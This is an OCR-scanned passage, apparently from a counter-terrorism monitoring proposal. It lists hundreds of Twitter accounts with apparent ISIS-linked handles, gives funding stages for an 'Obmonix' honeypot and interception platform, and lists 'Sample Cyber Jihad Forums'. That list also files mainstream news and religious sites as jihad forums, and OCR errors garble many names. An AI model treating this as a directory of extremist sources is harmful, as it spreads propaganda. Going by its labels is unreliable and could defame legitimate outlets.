¢ https://twitter.com/homsiia 

¢ https://twitter.com/4 _7m0o0d 

¢ https://twitter.com/ Djoiyriajw 

¢ https://twitter.com/96176629289 
¢ https://twitter.com/killer cail99 

¢ https://twitter.com/mfawas1 

¢ https://twitter.com/ohatab8 

¢ https://twitter.com/Ultrasmuslim1 
¢ https://twitter.com/A05462492 

¢ https://twitter.com/azve76 

¢ https://twitter.com/ClemStalDim 
¢ https://twitter.com/mahmood 

¢ https://twitter.com/aqill41 

¢ https://twitter.com/iahmd61 

¢ https://twitter.com/azve76 

¢ https://twitter.com/PicotNo 

¢ https://twitter.com/h_a_e_23 

¢ https://twitter.com/goo ias 

¢ https://twitter.com/ irl toby6 

¢ https://twitter.com/samhalo 

¢ https://twitter.com/samhalo 

¢ https://twitter.com/rdcongo _news 
¢ https://twitter.com/hytegetydyte 
¢ https://twitter.com/f75da586675f456 
¢ https://twitter.com/Muj 93 Hed 

¢ https://twitter.com/abohashmily 

¢ https://twitter.com/Alhareth 2 

¢ https://twitter.com/wfsfsd 


¢ https://twitter.com/FoopSeven 
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https://twitter.com/azve77 
https://twitter.com/Ali _G303L 


https://twitter.com/R9O07GupXDMObOpd 


https://twitter.com/georgebintol 
https://twitter.com/nightwalker 74he 
https://twitter.com/ahmadvasvv565 
https://twitter.com/Ansar AlShariaO 
https://twitter.com/Alsloli dog/media 
https://twitter.com/inmyheartisis 
https://twitter.com/om _elbarael 
https://twitter.com/saadsaudi2014 
https://twitter.com/timotim91217281 
https://twitter.com/ii o Olru 
https://twitter.com/aljanady75 
https://twitter.com/KatzOUmAIBaraaO 
https://twitter.com/ Mi _Sk _ 
https://twitter.com/Misk 2 a 
https://twitter.com/ISIS1995DD 
https://twitter.com/moohger121 
https://twitter.com/Omisshaq 
https://twitter.com/qatada _93 
https://twitter.com/Is _zarkiue 
https://twitter.com/Ali _G303L 
https://twitter.com/fgh959 
https://twitter.com/sdg42303540 
https://twitter.com/alptter _ 
https://twitter.com/umaisha55 
https://twitter.com/algwsd2233 
https://twitter.com/dfgndf2 
https://twitter.com/leembfs2017 


https://twitter.com/wearekillkofar 
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https://twitter.com/Om _islam47 
https://twitter.com/islamic _iso 
https://twitter.com/_a_a_20 
https://twitter.com/truth ee 
https://twitter.com/Fahad _Buhendi 
https://twitter.com/Imj _hallo 
https://twitter.com/er er 500 
https://twitter.com/86Roben 
https://twitter.com/DsdsdsfSddsd 
https://twitter.com/abu a_88 
https://twitter.com/sadkingp20 
https://twitter.com/noor _sban6 
https://twitter.com/is5 _is5 
https://twitter.com/JUI LJ 
https://twitter.com/qatada 9 
https://twitter.com/abo _al_zubair 
https://twitter.com/Othmanl14 C4 
https://twitter.com/nedalo9314 
https://twitter.com/SamalQ ___90 
https://twitter.com/Mar44ma 
https://twitter.com/Manaln9 
https://twitter.com/phupeuea 
https://twitter.com/aljanady75/ 
https://twitter.com/ Mi _Sk _ 
https://twitter.com/Misk 2 a 
https://twitter.com/ISIS1995DD 
https://twitter.com/moohger121 
https://twitter.com/198 _mazen 
https://twitter.com/CavalierDuSham 
https://twitter.com/SinaiTor 


https://twitter.com/NaserlS8 
https://twitter.com/oumme _aymen10 
https://twitter.com/gaznaya 
https://twitter.com/un _serviteur 
https://twitter.com/Tekindebeyvin 
https://twitter.com/ DavidThomson 
https://twitter.com/VegetaMoustache 
https://twitter.com/Millatlbrahim1 
https://twitter.com/Hayati LiLLah _ 
https://twitter.com/Alitt1245 
https://twitter.com/salehalawlqi1 
https://twitter.com/SimNasr 
https://twitter.com/xonraqqa 
https://twitter.com/aodaaoda4 
https://twitter.com/ Mi _Sk _ 
https://twitter.com/anwartab 
https://twitter.com/waswa0127 
https://twitter.com/ali523480 
https://twitter.com/Rhbdbd1 
https://twitter.com/AnsarAlSharia13 
https://twitter.com/Aljabarti46 
https://twitter.com/IslamiyaKurdi 
https://twitter.com/zayanepower 
https://twitter.com/WalaAndBara 
https://twitter.com/SFKIIIHHF — 0033 
https://twitter.com/AAdhim10 
https://twitter.com/MhdSayf 
https://twitter.com/abo 67 omar 
https://twitter.com/DawlaBrulFrance 
https://twitter.com/strange76292811 
https://twitter.com/Vbnisrt 
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¢ https://twitter.com/IS _ISO21 

¢ https://twitter.com/IS _IS022 

¢ https://twitter.com/AbdAllahGaza 
¢ https://twitter.com/khilafahOl _ 

¢ https://twitter.com/iislamic12 

¢ https://twitter.com/ajmurgent 

¢ https://twitter.com/bagiya79R 

¢ https://twitter.com/abujamaludeen02 
¢ https://twitter.com/ibn _abdiqany 
¢ https://twitter.com/killercat600 

¢ https://twitter.com/MisciFromTheD 
¢ https://twitter.com/3aam _Al _Diri 
¢ https://twitter.com/mnhtye 

¢ https://twitter.com/block _151 

¢ https://twitter.com/Hijazi 9111 

¢ https://twitter.com/ibn _dyala93 

¢ https://twitter.com/jxcjcj1 

¢ https://twitter.com/mosalma1991 
¢ https://twitter.com/rfvb7 

¢ https://twitter.com/alaser100 

¢ https://twitter.com/asd4000hd 

¢ https://twitter.com/AbdAllahGaza 
¢ https://twitter.com/MhdSayf 

¢ https://twitter.com/aqaqlgqa 

¢ https://twitter.com/mhunc1231 

¢ https://twitter.com/azdyisis55 

¢ https://twitter.com/Baghdad9191 
¢ https://twitter.com/74gh1 

¢ https://twitter.com/nnbb77881 

e https://twitter.com/a_t__29_ 7a 


¢ https://twitter.com/Kh _nsa143 
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https://twitter.com/theykillmybro 
https://twitter.com/210Birdy 
https://twitter.com/daish90 
https://twittercom/A__ Ac 
https://twitter.com/soman611 
https://twitter.com/qwerwoow 
https://twitter.com/fojraqqa 
https://twitter.com/saegr2 
https://twitter.com/ezzislamm 
https://twitter.com/ach3ari _maliki 
https://twitter.com/Ansar5433 
https://twitter.com/waja__1 
https://twitter.com/Islamic _3344 
https://twitter.com/Oj7jl (doe 
https://twitter.com/zeses2 
https://twitter.com/abu _a_89 
https://twitter.com/medad _med1 
https://twitter.com/block _151 
https://twitter.com/Alkurdi1995 
https://twitter.com/haydra2233 
https://twitter.com/Asirat _Tunisial 
https://twitter.com/Rouba56 
https://twitter.com/KA _II7 
https://twitter.com/bwwwg 
https://twitter.com/aljabri354 
https://twitter.com/msaks241 
https://twitter.com/wffff11089 
https://twitter.com/Djjjdjd4 
https://twitter.com/parisINHELL 
https://twitter.com/II32 111 
https://twitter.com/Daaeem51 
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¢ https://twitter.com/malekaty891 

¢ https://twitter.com/mouwa7ed _03 
¢ https://twitter.com/sunnahth1000 
¢ https://twitter.com/R _nxxt_1 

¢ https://twitter.com/qq _qq _79 

¢ https://twitter.com/rkrk4m25 

e https://twitter.com/OT _III57 

¢ https://twitter.com/Migrant2Allah 
¢ https://twitter.com/adgr19 

¢ https://twitter.com/Njd __zz77zz 

¢ https://twitter.com/Hhgff26176827 
¢ https://twitter.com/OOUItra00 

¢ https://twitter.com/rkrk4m25 

¢ https://twitter.com/rkrk4m26, 

¢ https://twitter.com/rkrk4m27 

¢ https://twitter.com/rkrk4m28 

¢ https://twitter.com/rkrk4m29 

¢ https://twitter.com/rkrk4m30 

¢ https://twitter.com/rkrk4m31 

¢ https://twitter.com/rkrk4m32 

¢ https://twitter.com/kaj__s 

¢ https://twitter.com/ABu _AlAylInaa 
¢ https://twitter.com/ABO SLEMAN 9 
¢ https://twitter.com/d _mf33 

¢ https://twitter.com/Turbo _zahid 

e https://twitter.com/ww _cvf 

¢ https://twitter.com/IITIIIITII 

¢ https://twitter.com/CF G66 

¢ https://twitter.com/abu _juuad 

¢ https://twitter.com/isis 2277 


¢ https://twitter.com/Asd15Wreg 
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https://twitter.com/abcdfghjkl12 


https://twitter.com/71AprVISHV18VIP 


https://twitter.com/Ha23ra3F987 
https://twitter.com/UiU _o UiU 
https://twitter.com/isuwh 
https://twitter.com/IIl_ _ Heart 
https://twitter.com/Sabaa760 
https://twitter.com/zajell8 
https://twitter.com/clockwise75 
https://twitter.com/jxcjcj1 
https://twitter.com/gjdfoi221qw 
https://twitter.com/smjh2154 
https://twitter.com/Aymanjrjr2 
https://twitter.com/khatabb66 
https://twitter.com/sor _hall 
https://twitter.com/isis 1188 
https://twitter.com/allmah89 
https://twitter.com/j3x _w8p 
https://twitter.com/om _ans102 
https://twitter.com/mfaw18 
https://twitter.com/dfgvdffcxx 
https://twitter.com/ississ _is 
https://twitter.com/DrAlnefisi 
https://twitter.com/Abovaseer34 
https://twitter.com/zeydusame5 
https://twitter.com/KH50380 
https://twitter.com/dskvnsflk/ 
https://twitter.com/Cano65525269 
https://twitter.com/AL _adnani 69 
https://twitter.com/isnacon0020 
https://twitter.com/lvj7165d 
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¢ https://twitter.com/zeses2 

e https://twitter.com/asloly | Ws5 
¢ https://twitter.com/alansari32MMOMM 
¢ https://twitter.com/hajed114 

¢ https://twitter.com/aboalhsn1111 

¢ https://twitter.com/paris _pigs 

¢ https://twitter.com/ibn _abdiqany 

¢ https://twitter.com/zzzassertty233 

¢ https://twitter.com/Bbdbd8 

¢ https://twitter.com/mozamjaer 16 

¢ https://twitter.com/TNT7msIm7 

¢ https://twitter.com/isis 7744 

¢ https://twitter.com/ayshafalaste2 

¢ https://twitter.com/d milla 

¢ https://twitter.com/Dhhd4874 

¢ https://twitter.com/Dr MagedMohamad 
¢ https://twitter.com/omarl14373 

¢ https://twitter.com/cyberkhilafa05 

¢ https://twitter.com/IIII32III| 

¢ https://twitter.com/Dhhd4874 

¢ https://twitter.com/akhy01 

* https://twitter.com/jahezona13 

¢ https://twitter.com/71AprVISHV18VIP 
¢ https://twitter.com/HuChuin _63 

¢ https://twitter.com/Katusha __28 

¢ https://twitter.com/Aamn145Aamn 

¢ https://twitter.com/Njd _ _zz77zz 

¢ https://twitter.com/DERA _AR 

¢ https://twitter.com/Migrant2Allah 

¢ https://twitter.com/Cbhj180 


¢ https://twitter.com/syppmgyfsvx34 
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https://twitter.com/abu2legend 
https://twitter.com/cyberkhilafa05 
https://twitter.com/asrtyuyufhd 
https://twitter.com/abo33dojana1992 


https://twitter.com/GHOTA AHRAR___ 


https://twitter.com/bhCotn 
https://twitter.com/aboferasalhalab 
https://twitter.com/sdg42303540 
https://twitter.com/M _Alfstaat 
https://twitter.com/Amatullah _222 
https://twitter.com/ward _aljanh 
https://twitter.com/arradar1 
https://twitter.com/aslan555111 
https://twitter.com/Saifaljzrawi 
https://twitter.com/abo _ali442 
https://twitter.com/114Muawiya 
https://twitter.com/JonnyDavid2 
https://twitter.com/khilafatekrit 
https://twitter.com/an _qa3 
https://twitter.com/mhmdfaisel 
https://twitter.com/seto _maiko 
https://twitter.com/ _ __17G 
https://twitter.com/kjul03 
https://twitter.com/bent Al 
https://twitter.com/abufalahalhind4 
https://twitter.com/mustafaklsh12 
https://twitter.com/abuhurairah103 
https://twitter.com/jihadist s 
https://twitter.com/Saeed _alHalabiO 
https://twitter.com/ValkryV5 
https://twitter.com/zd __bu 
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¢ https://twitter.com/x150isisa 

¢ https://twitter.com/moslem _1110 

¢ https://twitter.com/Hdlsishd 

¢ https://twitter.com/iislamic12 

¢ https://twitter.com/SFKIIIHHF — 0033 
¢ https://twitter.com/block 151 

¢ https://twitter.com/ibn _e _umarr 

¢ https://twitter.com/ibn _e _umarr 

¢ https://twitter.com/wilayet _alhabas 
¢ https://twitter.com/aadr40 

¢ https://twitter.com/alil12777 

¢ https://twitter.com/abuanas 13 

¢ https://twitter.com/m1b2q 

¢ https://twitter.com/ir 12 aq 

¢ https://twitter.com/ayshafalaste2 

¢ https://twitter.com/Muhaajirah _ 

¢ https://twitter.com/Bukhari _7 

¢ https://twitter.com/Dawlastan 

¢ https://twitter.com/Fahad _Buhendi 
¢ https://twitter.com/bagiya79R 

e https://twitter.com/mustafaklashi12 
¢ https://twitter.com/VegetaMoustache 
¢ https://twitter.com/norry28974869 
¢ https://twitter.com/dherghamm31 
¢ https://twitter.com/clash _eshke 

¢ https://twitter.com/maheridlbe1 

¢ https://twitter.com/lbrahimNomay 
¢ https://twitter.com/eysaneyw22 

¢ https://twitter.com/abubakr1435 
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¢ https://twitter.com/O0800008001 

¢ https://twitter.com/Abu _Bin _Fartin 

¢ https://twitter.com/marsds98zahrany 
¢ https://twitter.com/ _ihsen 086 _ 

¢ https://twitter.com/33Khilafa 

¢ https://twitter.com/gajhfjfd 

¢ https://twitter.com/Obayd6Wevrw 

¢ https://twitter.com/000000q 

¢ https://twitter.com/e30isisa 

¢ https://twitter.com/41linvasion 

¢ https://twitter.com/OpIS75 

¢ https://twitter.com/K _H _034 

¢ https://twitter.com/h90 6 

¢ https://twitter.com/know _ paris 

¢ https://twitter.com/saeu17 

¢ https://twitter.com/anjemchoudary 
¢ https://twitter.com/tnt502tnt502 


¢ https://twitter.com/AbuFullaan9th 
5856 


https://twitter.com/gmailco69426226 
https://twitter.com/Owais 51 
https://twitter.com/mohamed20607 
https://twitter.com/med _syr _ira91 
https://twitter.com/muslim _libi 
https://twitter.com/muahied _7 
https://twitter.com/qqeqq00111 
https://twitter.com/ahmed14377 
https://twitter.com/aabuyosif 
https://twitter.com/vip444662 
https://twitter.com/saeu17 
https://twitter.com/dgsdg00712420 
https://twitter.com/kabugezo 
https://twitter.com/Abulslam!IS1990 
https://twitter.com/mafel 65 
https://twitter.com/AbuHafsaBritani 
https://twitter.com/Ahmadkhalf2012 
https://twitter.com/YourOwnBro116 
https://twitter.com/ReportersO00 
https://twitter.com/TurMedia318/ 
https://twitter.com/GermanyUnderAtk 
https://twitter.com/WakeUp MV 
https://twitter.com/saeu17 
https://twitter.com/Bushral1l1 IS 
https://twitter.com/TurMedia318 
https://twitter.com/jabalybaraa 
https://twitter.com/s 2017 _ 
https://twitter.com/frm450 
https://twitter.com/gogoaag82 
https://twitter.com/xxx _ _800 


https://twitter.com/peOjnv39mvnf 
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¢ https://twitter.com/IslamArmy01 

¢ https://twitter.com/g8670062 8 

¢ https://twitter.com/yyf _hallo 

¢ https://twitter.com/elAFX9kbARBByHv 
¢ https://twitter.com/lba559721 

¢ https://twitter.com/del _elremah1 

¢ https://twitter.com/isisom61 

¢ https://twitter.com/Idififkk1 

¢ https://twitter.com/makdici1970 

¢ https://twitter.com/mahsud117 

e https://twitter.com/K_ A S E R_5 
¢ https://twitter.com/Imaqdese 

¢ https://twitter.com/nour umm 

¢ https://twitter.com/5aq5qDGpNsr4IDU 
¢ https://twitter.com/AbdMouwahid 

¢ https://twitter.com/gaza9310 

¢ https://twitter.com/Jfdlbk 

¢ https://twitter.com/Elkhelafa _Now 
¢ https://twitter.com/jazaer12254477 
¢ https://twitter.com/IssamSayari 

¢ https://twitter.com/Abo _mhdi29 

¢ https://twitter.com/moedker01 

¢ https://twitter.com/hafeed1001 

¢ https://twitter.com/Yamani _5 

e https://twitter.com/alsumoud17 

¢ https://twitter.com/nbn1000 

¢ https://twitter.com/khilafahinfos 

¢ https://twitter.com/teagouch1 

¢ https://twitter.com/aaallaaallaaa_ _ 
¢ https://twitter.com/ondayiwillkilly 


¢ https://twitter.com/DjibrilParisi 
5858 


https://twitter.com/aawwss _22 
https://twitter.com/Dolawiyah _Jo6 
https://twitter.com/gfd6064 
https://twitter.com/ansaar132 
https://twitter.com/drwaleed5253 
https://twitter.com/ajnad55 
https://twitter.com/inbes3 
https://twitter.com/asaudicowdonkey 
https://twitter.com/zxzx321zxzx 
https://twitter.com/UmmAbdallah89 
https://twitter.com/arabhty 
https://twitter.com/Asirat _hramin19 
https://twitter.com/EhliSunneti3 
https://twitter.com/salilonim 
https://twitter.com/Saifjazraawi 
https://twitter.com/ab1o3zam12 
https://twitter.com/frost0023 
https://twitter.com/uiopup 
https://twitter.com/Kassar _lam 
https://twitter.com/gmccccc10 
https://twitter.com/drherhdfbdrhdhs 
https://twitter.com/kinght78ag 
https://twitter.com/JUI _LJ 
https://twitter.com/snipern433 
https://twitter.com/Ffhfbfb1 
https://twitter.com/Almohajer _103 
https://twitter.com/oummoudjahid 


https://twitter.com/ahmadsaid91 
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Detailed Project Funding Stages Information 


The initial stage of the project will consist of selective and timely purchase of all the 
necessary appliances including the timely localization and successful acquisition of fake Web 
sites honeypot solutions including the active acquisition of network assets for the purpose of 
successfully honeypot solution placement. 


* The main objective of the initial phase would be to acquire all the necessary equipment 
for the purpose of setting up the foundations for the Obmonix platform. The equipment 
will be acquired in a timely fashion largely relying on a selected set of proprietary industry 
leading set of contacts. 


¢ The main objective of the next phrase would be to ensure that the equipment is placed in 
a secure location and is properly maintained for the purpose of ensuring that the operator 
is capable of operating the Obmonix platform in a secure way. 


¢ The main objective of the next phase would be to establish the foundations of the world’s 
largest data set of intelligence data for the purpose of ensuring that the Obmonix platform 
is capable of processing and intercepting the necessary data. 


¢ The main objective of the next phase would be to acquire the necessary proprietary service 
based solutions that would empower the operator with the necessary tools to process and 
intercept data. 


¢ The main objective of the next phase would be to process and intercept the world’s largest 
data set of cybercrime and cyber jihad data. 


Sample Cyber Jihad Forums: 


¢ http://rion2005.100free.com 

¢ http://2s2s.com 

¢ http://abo-ali.com 

¢ http://Aboalqaqa.blogspot.com 

¢ http://aboaumir.modawanati.com 
¢ http://abomoath.ahlablog.com 


¢ http://abomosab-s.110mb.com 
5860 


http://abu-hadi.net 
http://abu-qatada.com 
http://abubaraa.co.uk 
http://abujibriel.com 
http://aekhlaas.com 
http://aekhlaas.net 
http://ahlu-tawheed.com 
http://al3aren.com/vb/index.php 
http://al3wda.com/vb/index.php 
http://al-amanh.net 
http://al-ansar.net 
http://al-boraq.info 
http://al-boraq.org 
http://al-busyrol.info 
http://al-busyro.info 
http://al-ekhlaas.net 
http://al-ekhlaas.net/forum 
http://al-ekhlaas.org 
http://al-faloja.com 
http://al-faloja.info/vb/index.php 
http://al-farooqg.net 
http://al-jahafal.com/vb 
http://al-kafkaz.com 
http://al-mustaqbal.net 
http://al-nour.net 
http://al-ommh.net 
http://al-qimmah.net 
http://al-rashedeen.info 
http://al-tamkeen.com 
http://al-yemen.org 
http://alahed.org 
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¢ http://alamer.biz/ameer/home.html 
¢ http://alanbar.topgoo.net 

¢ http://alanssar.net 

¢ http://alaseb.com 

¢ http://albasrah.net/index.php 
¢ http://albawaba.com 

¢ http://albayan.co.uk 

¢ http://albayanislamac.com 

¢ http://albetagqa.com 

¢ http://alboraq.info 

¢ http://Alboraq.info/forum 

¢ http://alboraqforum.info 

¢ http://albtar.1talk.net/index.htm 
¢ http://albusyro.info 

¢ http://albuxoriy.com 

¢ http://alekhlaas.com 

¢ http://alekhlaas.info 

¢ http://alekhlaas.net 

¢ http://alekhlaas.org 

¢ http://alemaral.org 

¢ http://alemarah.org 

¢ http://alfajrtaqni.net 

¢ http://alfetn.com 

¢ http://alfetn.com 

¢ http://alfida.jeeran.com 

¢ http://alfidaa.biz 

¢ http://alfidaa.info/vb 

¢ http://alfidaa.org/vb 

¢ http://alforqan.ingoo.us 

¢ http://Alforqan.ingoo.us 


¢ http://alfurq4n.org 
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http://algyshalmnsur.r8.org 
http://AlHanein.com 
http://AlHesbah.net 
http://AlHesbah.org 
http://alifati.wordpress.com 
http://alintiqad.com 
http://aljazeeratalk.net/forum/ 
http://aljazeeratalk.net/portal 
http://alkhelafa.eu 
http://allah4ever.hi5.com 
http://almaqdese.net 
http://almaqreze.net 
http://almaqreze.net/ar 
http://almedad.com/vb 
http://almnbr.net/vb 
http://almob2.com 
http://almobshrat.net 
http://almokhtsar.com 
http://almqdes.net 


http://almubarakradio.com 


http://Alnakshabandia-army.com 
http://alnakshabandia-army.org/home 


http://Alneda.com 
http://Alnour.hyperphp.com 
http://alnour.hyperphp.com/vb 
http://Alnusra.net 
http://alnusrra.net 


http://alokab.com 


http://alokab.com/forums/lofiversion 


http://algdassam.ps 
http://alqoqaz.net 
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¢ http://alquds.co.uk 

¢ http://alrafdean.org 

¢ http://alraiah.net 

¢ http://Alsaha.com 

¢ http://alshahid.org 

¢ http://alsomod-iea.info 

¢ http://alsomod.com 

¢ http://alsunnah.info 

¢ http://Alsunnah.info 

¢ http://altabetoun.110mb.com 
¢ http://altarefe.com 

¢ http://altarefe.com is 

¢ http://altawbah.net/vb 

¢ http://altaybeh.net 

¢ http://alweya.com 

e http://an-najah.net 

¢ http://anashid.ru 

e http://Anbaar.net 

¢ http://anjemchoudary.co.uk 
¢ http://ansal.info 

¢ http://ansaaar.com 

¢ http://ansar1.info 

¢ http://ansarl1l.org 

¢ http://ansar-alhaqq.net 

¢ http://ansar-jihad.net 

¢ http://ansar.tv 

¢ http://Ansarnet.ws 

¢ http://ansharulislam.com 
¢ http://anti-majos.com 

¢ http://antiliberalnews.com 


¢ http://antydetroidmichigan.blog.onet.pl 
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http://aqeeda2008.maktoobblog.com 
http://aqlislamiccenter.com 
http://arrahmah.com 
http://asad101.jeeran.com 
http://asaeb.net 
http://asaebweb.com 
http://asd813.maktoobblog.com 
http://atahadii.com/vb 
http://Azzam.com 
http://azzammedia.com 
http://azzammedia.net 
http://bab-ul-islam.net 
http://baghdadsniper.net 
http://bintjbeil.com 
http://bumisyam.com 
http://cageprisoners.com 
http://cageuk.org 
http://chechensinsyria.com 
http://ClearGuidance.com 
http://clearinghous.infovlad.net 
http://cyberkov.com 
http://czeczenia.blog.onet.pl 
http://d-sunnah.net 
http://dakwahmedia.net 
http://darelhadi.com 
http://Darelhadi.com 
http://daruhilafe.com 
http://darultavhid.com 
http://daulahislamiyah.net 
http://daulahislamiyyah.com 
http://dawaalhaq.com 
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¢ http://dawatehaq.net 

¢ http://dawla-is.cf 

¢ http://dd-sunnah.net/forum/index.php 
¢ http://dhigar.net 

* http://dinhaqq.info 

¢ http://doguturkistanbulteni.com 

¢ http://dr-algzouli.com 

¢ http://dr-mahmoud.com 

¢ http://drbj.net 

¢ http://duniaterkini.com 

¢ http://dwl-is.appspot.com 

¢ http://dyou1991.maktoobblog.com 
¢ http://e-kl-s.info 

¢ http://e-kl-s.net 

¢ http://egysite.com/al2nsar 

¢ http://ek-Is.org 

* http://ekhlaas.biz 

¢ http://ekhlaas.cc 

¢ http://Ekhlaas.cc 

¢ http://ekhlaas.com 

¢ http://ekhlaas.info 

¢ http://ekhlaas.net 

¢ http://ekhlaas.org 

¢ http://ekhlaas.ws 

¢ http://el-tewhid.com 

¢ http://eldorar.com 

¢ http://elmanara.org 

¢ http://Elshouraa.ws/vb 

¢ http://eltwhed.110mb.com 

¢ http://eltwhed.110mb.com/homepage.htm 


¢ http://enfalmedya.com 
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http://eramuslim.com 


http://eraqeidawlh.maktoobblog.com 


http://f2008h.maktoobblog.com 
http://falestiny.net 
http://falloja.blogspot.com 
http://farougomar.net 
http://fatehforums.com 
http://fidaal.net/vb 
http://fisyria.info 
http://forum.hawaaworld.com 
http://forum.saraya.ps 
http://forums.ikhwan.net/t 
http://forums.naseej.com 
http://fpi.or.id 
http://fursan-al-irag.over-blog.com 
http://g-elshmal.com/vb/index.php 
http://generalvekalat.org 
http://ghaaly.com 
http://ghaliboun.net 
http://gimfmedia.com/tech 
http://gulf-up.com 
http://gurmad.info 
http://h-alali.net 
http://nalabnews.com 
http://halifat.info 
http://halifat.org 
http://nhamas.ps 
http://nhamasaliraq.com 
http://hamasiraq.org 
http://hanein.info 
http://hanein.info/ 
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¢ http://hanein.info/vb 

¢ http://hanein.info/vb/forum.php 
¢ http://harb-net.com/vb 

¢ http://narunyahya.com 

¢ http://health1.maktoobblog.com 
¢ http://newar.khayma.com 

¢ http://heyetnet.org 

¢ http://hidayatullah.com 

¢ http://hizb-afghanistan.com 

¢ http://hizb-america.org 

¢ http://hizb-australia.org 

¢ http://hizb-eastafrica.com 

¢ http://hizb-pakistan.com 

¢ http://hizb-russia.info 

¢ http://hizb-turkiston.net 

¢ http://hizb-turkiye.org 

¢ http://hizb-ut-tahrir-almaghreb.info 
¢ http://hizb-ut-tahrir.dk 

¢ http://hizb-ut-tahrir.info 

¢ http://hizb-ut-tahrir.org 

¢ http://hizb-ut-tahrirse 

¢ http://hizb-uzbekistan.info 

¢ http://hizb.org.ua 

¢ http://hizb.org.uk 

¢ http://Hizbollah.org 

¢ http://hizbollah.tv 

¢ http://Hizbollah.tv 

¢ http://hizbut-tahrir.or.id 

¢ http://hizbuttahrir.info 

¢ http://hizbuttahrir.org 


¢ http://ht-afghanistan.org 
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http://ht-bangladesh.info 
http://ht-tunisie.info 
http://htmedia.info 
http://alboraqmedia.org 
http://alekhlaas.cc 
http://alweehdat.com/vb 
http://Hussamaldin.jeeran.com 
http://iaisite-eng.org 
http://iaisite. biz 
http://laisite.info 
http://iaisite.info 
http://iaisite.info/index.php 
http://iaisite.net 
http://iaisite.org 
http://iczkeria.blog.onet.pl 
http://iknwan.net 
http://imamtv.com 
http://imamtv.com/ 
http://infovlad.net/mirror alansar alsunnah 
http://invitetoislam.com 
http://invitetoislam.org 
http://iraq-war.ru 
http://Iraqgiasaeb.org 
http://iraqipa.net 
http://iraqirabita.org.uk 
http://iraqiyoon.com 
http://Iraqpatrol.com 
http://iraqpatrol.com 
http://iraqpatrol.com/php 
http://isdarat-tube.com 


http://isdarat.org 
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¢ http://isdarat.tv 

¢ http://isecurlty.com 

¢ http://islahhaber.net 

¢ http://islam-iea.com 

¢ http://islamdaveti.com 

¢ http://islamdevleti.info 

¢ http://islamdevleti.org 

¢ http://islamdevleti.org/ 

¢ http://islamdin.com 

¢ http://islamdin.net 

¢ http://islamic-dw.com 

¢ http://islamic-f.net/vb 

¢ http://Islamic-f.net/vb 

¢ http://islamic-state.ga 

¢ http://islamic-state.media 

¢ http://islamicawakening.com 

¢ http://islamicdigest.net 

¢ http://islamiciragq.maktoobblog.com 
¢ http://Islamiclraq.modawanati.com 
¢ http://islamiciragq.modawanati.com 
¢ http://islamicstate.media 

¢ http://islamicstate.pro 

¢ http://islamicsupremecouncil.org 
¢ http://islammemo.cc 

¢ http://islampos.com 

* http://islamqa.info 

¢ http://islamway.com 

¢ http://isnews.net 

¢ http://j-alirag.net 

¢ http://jaami.info 


¢ http://jaber-m-b.maktoobblog.com 
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http://jaber-mb.maktoobblog.com 
http://jabhtnosra.appspot.com 
http://jaishabibaker.net 
http://JaishabiBaker.net 
http://jamaatshariat.com/ru 
http://jamahirl.ps 
http://jamatdawa.com 
http://jamatdawa.org 
http://jannatoshiqlari.net 
http://jehadway.7olm.org 
http://jihadmin.com 
http://jnoub.org 
http://JjondurRahmaan.com 
http://jsc-web.net/vb 
http://kabardeyonline.org/tr/index _tr.htm 
http://kafilahmujahid.com 
http://kafkaz.maktoobblog.com 
http://Kataeb-20.org 
http://kataeb-20.org/main 
http://kataibaqssa.com/forum/index.php 
http://kataibaqssa.com/newarab 
http://kavkaz.org.uk 
http://kavkaz.tv 
http://kavkazcenter.com 
http://kavkazcenter.info 
http://kavkazcenter.net 
http://kavkazchat.com 
http://kavkazjihad.com 
http://khabarpana.com 
http://khaleelstyle.com 


http://khelafa.org 
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¢ http://khilafa.org 

¢ http://khilafah-archives.com 

¢ http://khilafah.com 

¢ http://khilafah.net 

¢ http://khilafat.dk 

¢ http://kiblat.net 

¢ http://kirkuk.kalamfikalam.com 

¢ http://kokludegisim.net 

¢ http://ktb-20.com 

¢ http://Kwaflislam.com 

¢ http://kwaflislam.com/vb/index.php 
¢ http://ladn.maktoobblog.com 

¢ http://lakii.com 

¢ http://land-alsham.com 

¢ http://lasdipo.com 

¢ http://liputan-kita.com 

¢ http://m3ark.com 

¢ http://mail.ek-ls.org 

¢ http://Majahd.quickbb.net 

¢ http://majahd.quickbb.net/index.htm 
¢ http://majahden.com 

¢ http://majelismujahidi.com 

¢ http://majles.alukah.net 

¢ http://maktoobblog.com 

¢ http://manbar.me 

¢ http://maqrezeradio.net 

¢ http://marsad.net 

¢ http://mediaislam.ucoz.ru 

¢ http://medicine2001.maktoobblog.com 
¢ http://mhesne.com 


¢ http://mitv.moy.su 
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http://mnbr.info 
http://mobasher.110mb.com 
http://moj-irg.com 
http://montada.yaqgen.net 
http://moqavemat.com 
http://moqawama.org 
http://moqawama.tv 
http://moqawmh.com 
http://morasl.maktoobblog.com/ 
http://mujahideenarmy.com 
http://muntada.sawtalummah.com 
http://muqawamah.com 
http://muslimdaily.net 
http://muslimprisoners.com 
http://muslimuzbekistan.net 
http://muslm.net 
http://muslm.net/vb 
http://muslm.org 
http://muvahhid.info 
http://muwahhid.info 
http://muwahideen.co.nr 
http://myhesbah.net 
http://mykhilafah.com 
http://mymy.my-goo.net/index.htm 
http://nahimunkar.com 
http://nasrollah.org 
http://Nasrunmiallah.net 
http://nepras.ps 
http://news.stcom.net 
http://News.stcom.net 


http://nkusa.org 
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¢ http://nmayd.com 

¢ http://nmayd.com/ 

¢ http://nuruddin.4bb.ru 

¢ http://nusraah.com 

¢ http://old.kavkazcenter.com 

¢ http://omar-abdrahman.110mb.com 
¢ http://pal-is.net/vb 

¢ http://paldf.net 

¢ http://paldf.net/forum 

¢ http://palestine-info.com 

¢ http://palestinegallery.com 

¢ http://palestinianforum.net 

¢ http://palir.net 

¢ http://panjimas.com 

¢ http://pda.kavkaz.tv 

¢ http://profetensummah.com 

e http://qassam-rockets.skyrock.com 
¢ http://qassam-rockets.skyrock.com 
¢ http://qassam.ps 

¢ http://qudsnews.net 

¢ http://qyemen.com 

¢ http://radioalfurqaan.com 

¢ http://radioalfurqaan.com is 

¢ http://radioandalus24.com 

¢ http://radyotevhid.com 

¢ http://ramaadi.1talk.net/index.htm 
¢ http://rawadalmaly.com/vb 

¢ http://reformandjihadfront.org 

¢ http://revolution.muslimpad.com 

¢ http://rjfront.info 


¢ http://rjfront.org 
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http://Rmadi.top-me.com 
http://saadarmy.com 
http://saaid.net 
http://sadcom.montadamoslim.com 
http://salaf-us-saalih.com 
http://Salafia.balder.prohosting.com 
http://salafiah.com 
http://salafimediauk.com 
http://salam-online.com 
http://samirkuntar.org 
